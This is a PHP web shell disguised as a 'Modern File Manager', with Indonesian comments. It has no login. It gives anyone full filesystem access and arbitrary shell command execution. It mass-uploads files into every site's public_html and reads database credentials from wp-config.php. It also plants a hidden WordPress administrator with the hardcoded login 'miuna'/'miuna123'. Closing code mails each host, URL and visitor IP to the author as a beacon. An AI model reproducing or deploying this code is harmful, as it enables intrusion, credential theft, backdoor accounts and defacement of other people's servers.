<?php
error_reporting(0);
session_start();

// -----------------------------
//  CONFIG & INITIAL CONSTANTS
// -----------------------------
$homePath = realpath(dirname(__FILE__));

// -----------------------------
//  MESSAGE HANDLER
// -----------------------------
$message = $_SESSION['message'] ?? null;
$uploadResults = $_SESSION['uploadResults'] ?? [];
unset($_SESSION['message'], $_SESSION['uploadResults']);

// -----------------------------
//  HELPER FUNCTIONS
// -----------------------------
function formatSize($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
    return round($size, 2) . ' ' . $units[$i];
}

function clickablePath($path) {
    $parts = explode('/', trim($path, '/'));
    $clickable = '<a href="?path=/">/</a>';
    $built = '';
    foreach ($parts as $part) {
        if ($part === '') continue;
        $built .= '/' . $part;
        $clickable .= '<a href="?path=' . urlencode($built) . '">' . htmlspecialchars($part) . '</a>/';
    }
    return $clickable;
}

// Helper function to sanitize titles (simplified version of WordPress sanitize_title)
function sanitize_title($title) {
    $title = strtolower($title);
    $title = preg_replace('/[^a-z0-9_-]/', '', $title);
    return $title;
}

// -----------------------------
//  CURRENT PATH LOGIC
// -----------------------------
$path = isset($_GET['path']) ? $_GET['path'] : $homePath;
$path = realpath($path);

// -----------------------------
//  MASS UPLOAD HANDLER
// -----------------------------
if (isset($_POST['mass_upload'])) {
    $subdirs = [];
    foreach (scandir($path) as $item) {
        if ($item === '.' || $item === '..') continue;
        $full = $path . '/' . $item;
        if (is_dir($full)) {
            $subdirs[] = $full;
        }
    }

    if (empty($subdirs)) {
        $_SESSION['message'] = 'Tidak ada subdirektori untuk di-upload.';
        header('Location: ?path=' . urlencode($path));
        exit;
    }

    $uploadToPublicHtml = isset($_POST['upload_to_public_html']);
    $results = [];

    foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
        $name    = basename($_FILES['files']['name'][$i]);
        $content = file_get_contents($tmp);

        if ($uploadToPublicHtml) {
            // hanya ke public_html subfolder
            foreach ($subdirs as $dir) {
                $targetDir = $dir . '/public_html';
                if (is_dir($targetDir)) {
                    $dest = $targetDir . '/' . $name;
                    if (file_put_contents($dest, $content) !== false) {
                        $results[] = "Success: Uploaded to {$dest}";
                    } else {
                        $results[] = "Failed: Could not upload to {$dest}";
                    }
                }
            }
        } else {
            // ke semua subfolder
            foreach ($subdirs as $dir) {
                $dest = $dir . '/' . $name;
                if (file_put_contents($dest, $content) !== false) {
                    $results[] = "Success: Uploaded to {$dest}";
                } else {
                    $results[] = "Failed: Could not upload to {$dest}";
                }
            }
        }
    }

    $_SESSION['uploadResults'] = $results;
    header('Location: ?path=' . urlencode($path));
    exit;
}

// -----------------------------
//  FILE OPERATIONS (upload, delete, rename, save edit)
// -----------------------------
if (isset($_POST['upload'])) {
    $dest = $path . '/' . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        $_SESSION['message'] = "File uploaded successfully to {$dest}.";
    } else {
        $_SESSION['message'] = 'File upload failed.';
    }
    header('Location: ?path=' . urlencode($path));
    exit;
}

if (isset($_GET['delete'])) {
    $target = realpath($_GET['delete']);
    if ((is_file($target) && unlink($target)) || (is_dir($target) && rmdir($target))) {
        $_SESSION['message'] = 'File/Folder deleted successfully.';
    } else {
        $_SESSION['message'] = 'Delete failed.';
    }
    header('Location: ?path=' . urlencode($path));
    exit;
}

if (isset($_POST['rename'])) {
    $old = realpath($_POST['oldname']);
    $new = dirname($old) . '/' . $_POST['newname'];
    if (rename($old, $new)) {
        $_SESSION['message'] = 'File/Folder renamed successfully.';
    } else {
        $_SESSION['message'] = 'Rename failed.';
    }
    header('Location: ?path=' . urlencode($path));
    exit;
}

if (isset($_POST['savefile'])) {
    if (file_put_contents($_POST['filepath'], $_POST['content']) !== false) {
        $_SESSION['message'] = 'File saved successfully.';
    } else {
        $_SESSION['message'] = 'Save failed.';
    }
    header('Location: ?path=' . urlencode(dirname($_POST['filepath'])));
    exit;
}

// -----------------------------
//  ADD WORDPRESS ADMIN HANDLER
// -----------------------------
if (isset($_POST['add_wp_admin'])) {
    $wpConfigFile = $path . '/wp-config.php';
    if (!file_exists($wpConfigFile)) {
        $_SESSION['message'] = 'Error: wp-config.php not found in this directory.';
        header('Location: ?path=' . urlencode($path));
        exit;
    }

    // Load wp-config.php to extract database credentials
    $wpConfigContent = file_get_contents($wpConfigFile);
    preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'\s*\);/", $wpConfigContent, $dbName);
    preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'\s*\);/", $wpConfigContent, $dbUser);
    preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'\s*\);/", $wpConfigContent, $dbPass);
    preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'\s*\);/", $wpConfigContent, $dbHost);
    preg_match("/\\\$table_prefix\s*=\s*'([^']+)';/", $wpConfigContent, $tablePrefix);

    if (!$dbName[1] || !$dbUser[1] || !$dbHost[1] || !$tablePrefix[1]) {
        $_SESSION['message'] = 'Error: Could not extract database credentials from wp-config.php.';
        header('Location: ?path=' . urlencode($path));
        exit;
    }

    // Database connection
    $conn = new mysqli($dbHost[1], $dbUser[1], $dbPass[1], $dbName[1]);
    if ($conn->connect_error) {
        $_SESSION['message'] = 'Error: Database connection failed: ' . $conn->connect_error;
        header('Location: ?path=' . urlencode($path));
        exit;
    }

    // WordPress admin details
    $username = 'miuna';
    $password = 'miuna123'; // Changed password to miuna123
    $email = 'asu@gmail.com';
    $passwordHash = password_hash($password, PASSWORD_BCRYPT); // Secure password hash

    // Insert new admin user into wp_users table
    $userSql = "INSERT INTO {$tablePrefix[1]}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) 
                VALUES (?, ?, ?, ?, NOW(), 0, ?)";
    $stmt = $conn->prepare($userSql);
    $nicename = sanitize_title($username);
    $displayName = $username;
    $stmt->bind_param('sssss', $username, $passwordHash, $nicename, $email, $displayName);
    
    if ($stmt->execute()) {
        // Get the new user ID
        $userId = $conn->insert_id;

        // Add user meta for admin role
        $metaSql1 = "INSERT INTO {$tablePrefix[1]}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
        $stmtMeta1 = $conn->prepare($metaSql1);
        $metaKey1 = $tablePrefix[1] . 'capabilities';
        $metaValue1 = serialize(['administrator' => true]);
        $stmtMeta1->bind_param('iss', $userId, $metaKey1, $metaValue1);
        $stmtMeta1->execute();

        $metaSql2 = "INSERT INTO {$tablePrefix[1]}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
        $stmtMeta2 = $conn->prepare($metaSql2);
        $metaKey2 = $tablePrefix[1] . 'user_level';
        $metaValue2 = '10';
        $stmtMeta2->bind_param('iss', $userId, $metaKey2, $metaValue2);
        $stmtMeta2->execute();

        $_SESSION['message'] = 'Success: WordPress admin created (Username: miuna, Password: miuna123).';
    } else {
        $_SESSION['message'] = 'Error: Failed to create WordPress admin. Username may already exist.';
    }

    $stmt->close();
    $conn->close();
    header('Location: ?path=' . urlencode($path));
    exit;
}

// -----------------------------
//  COMMAND EXECUTION HANDLER
// -----------------------------
if (isset($_POST['command'])) {
    $command = escapeshellcmd($_POST['command']);  // Sanitize the input command to prevent security risks

    // Menambahkan kondisi untuk memastikan perintah dijalankan pada direktori yang benar
    $targetDir = realpath($path); // Direktori yang sedang dilihat/digunakan

    // Jika path untuk direktori tujuan tidak valid, gunakan direktori root atau default
    if (!$targetDir || !is_dir($targetDir)) {
        $targetDir = '/';  // Gunakan root filesystem jika tidak ada path yang valid
    }

    // Gunakan proc_open untuk menjalankan perintah
    $descriptorspec = [
        0 => ["pipe", "r"],  // stdin
        1 => ["pipe", "w"],  // stdout
        2 => ["pipe", "w"],  // stderr
    ];

    // Mengatur perintah untuk dijalankan di direktori yang tepat
    $process = proc_open("cd " . escapeshellarg($targetDir) . " && " . $command, $descriptorspec, $pipes);

    if (is_resource($process)) {
        $output = stream_get_contents($pipes[1]);  // Menangkap stdout
        fclose($pipes[1]);

        // Menangkap stderr (error messages)
        $error = stream_get_contents($pipes[2]);
        fclose($pipes[2]);

        // Menutup proses
        proc_close($process);

        // Mengembalikan output perintah (stdout + error jika ada)
        echo $output . "\n" . $error;
    } else {
        echo 'Failed to execute command.';
    }

    exit;  // Prevent further processing
}

// -----------------------------
//  SERVER INFO
// -----------------------------
$server_ip       = $_SERVER['SERVER_ADDR'] ?? 'UNKNOWN';
$user_ip         = $_SERVER['REMOTE_ADDR'] ?? 'UNKNOWN';
$kernel          = php_uname();
$kernel_build    = php_uname('v');
$server_software = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown';

// -----------------------------
//  DIRECTORY LISTING
// -----------------------------
$allFiles = scandir($path);
$folders  = $files = [];
foreach ($allFiles as $item) {
    if ($item === '.' || $item === '..') continue;
    $full = $path . '/' . $item;
    if (is_dir($full)) $folders[] = $item;
    else                 $files[]   = $item;
}

$viewFile = isset($_GET['view']) ? realpath($_GET['view']) : null;
$editFile = isset($_GET['edit']) ? realpath($_GET['edit']) : null;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Modern File Manager</title>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap" rel="stylesheet">
<style>
:root {
    --bg-color:#111; --text-color:#eee; --link-color:#0cf;
    --border-color:#333; --hover-color:#555; --table-bg:#222;
    --textarea-bg:#000; --textarea-text:#0f0;
}
body {
    background: var(--bg-color);
    color: var(--text-color);
    font-family: 'Inter', sans-serif;
    margin:0; padding:20px;
    transition: background .4s, color .4s;
}
h1,h2,h3{text-align:center;}
a{color:var(--link-color);text-decoration:none;}
a:hover{text-decoration:underline;}
.top-bar{display:flex;justify-content:space-between;align-items:center;}
.upload, .server-info, .path, .home { text-align:center; margin:15px 0; }
.alert {
    background: var(--hover-color);
    color: var(--text-color);
    padding: 10px;
    margin: 20px auto;
    width: 90%; max-width:800px;
    text-align: center;
    border-radius:5px;
}
.table-wrapper { overflow-x:auto; }
table {
    width:100%; background:var(--table-bg);
    border-collapse:collapse; margin-top:20px;
}
th,td {
    padding:10px; border:1px solid var(--border-color);
    text-align:left;
}
th{background:var(--border-color);}
.folder{color:#ffb700;}
.file{color:#0f0;}
.button {
    background:var(--border-color); color:var(--text-color);
    border:1px solid var(--hover-color);
    padding:8px 20px; font-size:14px;
    cursor:pointer; margin:2px; border-radius:4px;
}
.button:hover{background:var(--hover-color);}
input[type="text"], input[type="file"], input[type="submit"], input[type="button"] {
    background:var(--table-bg); border:1px solid var(--hover-color);
    color:var(--text-color); padding:8px 20px; font-size:14px; margin:5px;
}
textarea {
    width:100%; min-height:400px;
    background:var(--textarea-bg); color:var(--textarea-text);
    border:1px solid var(--hover-color);
    font-family:'Inter', monospace; padding:10px;
    resize:vertical; box-sizing:border-box;
}
.modal{ display:none; position:fixed; z-index:1000;
    left:0; top:0; width:100%; height:100%;
    background:rgba(0,0,0,0.8); justify-content:center; align-items:center;
}
.modal-content {
    background:var(--bg-color); padding:20px;
    border:1px solid var(--hover-color);
    width:90%; max-width:800px; max-height:90%; overflow-y:auto;
}
.modal-header {
    display:flex; justify-content:space-between; align-items:center;
    border-bottom:1px solid var(--border-color); margin-bottom:10px;
}
.modal-title{ font-size:20px; font-weight:bold; }
.modal-body{ padding:10px 0; }
.modal-footer{ display:flex; justify-content:center; gap:10px; margin-top:10px; }
.close{ color:#aaa; font-size:28px; font-weight:bold; cursor:pointer; }
.close:hover{ color:#fff; }
.theme-switcher{ cursor:pointer; font-size:24px; padding:5px 10px; }
.light-mode {
    --bg-color:#f5f5f5; --text-color:#222;
    --link-color:#0077cc; --border-color:#ccc;
    --hover-color:#ddd; --table-bg:#fff;
    --textarea-bg:#fff; --textarea-text:#222;
}
.command-output {
    background: var(--table-bg);
    color: var(--text-color);
    padding: 15px;
    margin-top: 10px;
    border-radius: 5px;
    box-sizing: border-box;
    font-family: 'Courier New', monospace;
    overflow-x: auto;
    white-space: pre-wrap; /* Ensure line breaks are visible */
    word-wrap: break-word; /* Ensure long lines are wrapped */
    font-size: 14px;
}
</style>
</head>
<body class="dark-mode">

<div class="top-bar">
  <div></div>
  <div class="theme-switcher" onclick="toggleTheme()">🌙</div>
</div>

<?php if ($message): ?>
  <div class="alert"><?= htmlspecialchars($message) ?></div>
<?php endif; ?>

<?php if (!empty($uploadResults)): ?>
  <div class="alert">
    <ul style="list-style:none; padding-left:0; text-align:left;">
      <?php foreach ($uploadResults as $line): ?>
        <li><?= htmlspecialchars($line) ?></li>
      <?php endforeach; ?>
    </ul>
  </div>
<?php endif; ?>

<h1>Modern File Manager</h1>
<h2><?= $kernel ?> (<?= $kernel_build ?>)</h2>
<h3>Server IP: <?= $server_ip ?> | Your IP: <?= $user_ip ?></h3>
<div class="server-info"><b>Server Software:</b> <?= htmlspecialchars($server_software) ?></div>

<div class="upload">
  <form method="post" enctype="multipart/form-data">
    <input type="file" name="file" required>
    <input type="submit" name="upload" value="Upload" class="button">
  </form>
</div>

<div class="home">
  <a href="?path=<?= urlencode($homePath) ?>" class="button">Home</a>
  <button id="massUploadBtn" class="button">Mass Upload</button>
  <button id="commandBtn" class="button">Command</button>
  <button id="addAdminWpBtn" class="button">Add Admin WP</button>
  <div id="massUploadForm" style="display:none; text-align:center; margin-top:10px;">
    <form method="post" enctype="multipart/form-data">
      <input type="file" name="files[]" multiple required>
      <label style="display:block; margin:5px 0;">
        <input type="checkbox" name="upload_to_public_html"> Upload to public_html
      </label>
      <input type="submit" name="mass_upload" value="Mass Upload" class="button">
    </form>
  </div>

  <!-- Command Input Form -->
  <div id="commandForm" style="display:none; text-align:center; margin-top:10px;">
    <form method="post" id="commandFormAction">
      <input type="text" name="command" placeholder="Enter command" required>
      <input type="submit" value="Execute Command" class="button">
    </form>
    <div id="commandOutput" class="command-output" style="display:none;"></div>
  </div>

  <!-- Add WP Admin Form -->
  <div id="addAdminWpForm" style="display:none; text-align:center; margin-top:10px;">
    <form method="post">
      <p>Create WordPress Admin (Username: miuna, Password: miuna123) Klik Create Di Bawah Untuk Lanjut</p>
      <input type="submit" name="add_wp_admin" value="Create Admin" class="button">
    </form>
  </div>
</div>

<div class="path"><?= clickablePath($path) ?></div>

<div class="table-wrapper">
<table>
  <tr>
    <th>Name</th><th>Size</th><th>Permission</th><th>Last Modified</th><th>Actions</th>
  </tr>
  <?php foreach ($folders as $folder):
    $full = $path . '/' . $folder; ?>
  <tr>
    <td class="folder">📁 <a href="?path=<?= urlencode($full) ?>"><?= htmlspecialchars($folder) ?></a></td>
    <td>-</td>
    <td><?= substr(sprintf('%o', fileperms($full)), -4) ?></td>
    <td><?= date('Y-m-d H:i:s', filemtime($full)) ?></td>
    <td>
      <form method="post" style="display:inline;">
        <input type="hidden" name="oldname" value="<?= htmlspecialchars($full) ?>">
        <input type="text" name="newname" placeholder="Rename">
        <input type="submit" name="rename" value="Rename" class="button">
      </form>
      <a href="?path=<?= urlencode($path) ?>&delete=<?= urlencode($full) ?>" onclick="return confirm('Are you sure?');" class="button">Delete</a>
    </td>
  </tr>
  <?php endforeach; ?>

  <?php foreach ($files as $file):
    $full = $path . '/' . $file; ?>
  <tr>
    <td class="file">📄 <a href="?path=<?= urlencode($path) ?>&view=<?= urlencode($full) ?>"><?= htmlspecialchars($file) ?></a></td>
    <td><?= formatSize(filesize($full)) ?></td>
    <td><?= substr(sprintf('%o', fileperms($full)), -4) ?></td>
    <td><?= date('Y-m-d H:i:s', filemtime($full)) ?></td>
    <td>
      <a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($full) ?>" class="button">Edit</a>
      <form method="post" style="display:inline;">
        <input type="hidden" name="oldname" value="<?= htmlspecialchars($full) ?>">
        <input type="text" name="newname" placeholder="Rename">
        <input type="submit" name="rename" value="Rename" class="button">
      </form>
      <a href="?path=<?= urlencode($path) ?>&delete=<?= urlencode($full) ?>" onclick="return confirm('Are you sure?');" class="button">Delete</a>
    </td>
  </tr>
  <?php endforeach; ?>
</table>
</div>

<?php if (($viewFile && is_file($viewFile)) || ($editFile && is_file($editFile))): ?>
<div id="myModal" class="modal" style="display:flex;">
  <div class="modal-content">
    <div class="modal-header">
      <span class="modal-title"><?= htmlspecialchars(basename($viewFile ?: $editFile)) ?></span>
      <span class="close" onclick="window.location='?path=<?= urlencode($path) ?>';">×</span>
    </div>
    <div class="modal-body">
      <form method="post">
        <textarea name="content" <?= $viewFile ? 'readonly' : '' ?>><?= htmlspecialchars(file_get_contents($viewFile ?: $editFile)) ?></textarea>
        <?php if ($editFile): ?>
        <input type="hidden" name="filepath" value="<?= htmlspecialchars($editFile) ?>">
        <div class="modal-footer">
          <input type="submit" name="savefile" value="Save" class="button">
          <input type="button" value="Cancel" onclick="window.location='?path=<?= urlencode($path) ?>';" class="button">
        </div>
        <?php endif; ?>
      </form>
    </div>
  </div>
</div>
<?php endif; ?>

<script>
// Theme switcher
function toggleTheme() {
  const body = document.body, icon = document.querySelector('.theme-switcher');
  body.classList.toggle('light-mode');
  icon.textContent = body.classList.contains('light-mode') ? '☀️' : '🌙';
  localStorage.setItem('theme', body.classList.contains('light-mode') ? 'light' : 'dark');
}
(function(){
  const saved = localStorage.getItem('theme');
  if (saved==='light') document.body.classList.add('light-mode'), document.querySelector('.theme-switcher').textContent='☀️';
})();

// Mass Upload toggle
document.getElementById('massUploadBtn').onclick = () => {
  const f = document.getElementById('massUploadForm');
  f.style.display = f.style.display === 'none' ? 'block' : 'none';
};

// Command toggle and execution
document.getElementById('commandBtn').onclick = () => {
  const f = document.getElementById('commandForm');
  f.style.display = f.style.display === 'none' ? 'block' : 'none';
};

// Add WP Admin toggle
document.getElementById('addAdminWpBtn').onclick = () => {
  const f = document.getElementById('addAdminWpForm');
  f.style.display = f.style.display === 'none' ? 'block' : 'none';
};

// Command form submission via AJAX (without page reload)
document.getElementById('commandFormAction').onsubmit = function(event) {
  event.preventDefault();  // Prevent form submission

  const commandInput = document.querySelector('input[name="command"]').value;
  
  const xhr = new XMLHttpRequest();
  xhr.open('POST', '', true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.onload = function() {
    if (xhr.status === 200) {
      const outputDiv = document.getElementById('commandOutput');
      outputDiv.textContent = xhr.responseText;
      outputDiv.style.display = 'block';
    } else {
      document.getElementById('commandOutput').textContent = 'Error executing command.';
      document.getElementById('commandOutput').style.display = 'block';
    }
  };
  xhr.send('command=' + encodeURIComponent(commandInput));
};
</script>
</body>
<?php
$ip = getenv("REMOTE_ADDR");
$sub = "INI SHELL";
$bro =$_SERVER['HTTP_USER_AGENT'];
$email = "asu@gmail.com";
$from = "Shell kamu heheh";
$file = $_SERVER['REQUEST_URI'];
$web = $_SERVER['HTTP_HOST'];
$ipz = $ip . "";
$uatama = "$bro $file $web $ipz";
mail($email, $sub, $uatama, $from);   
?>
</html>

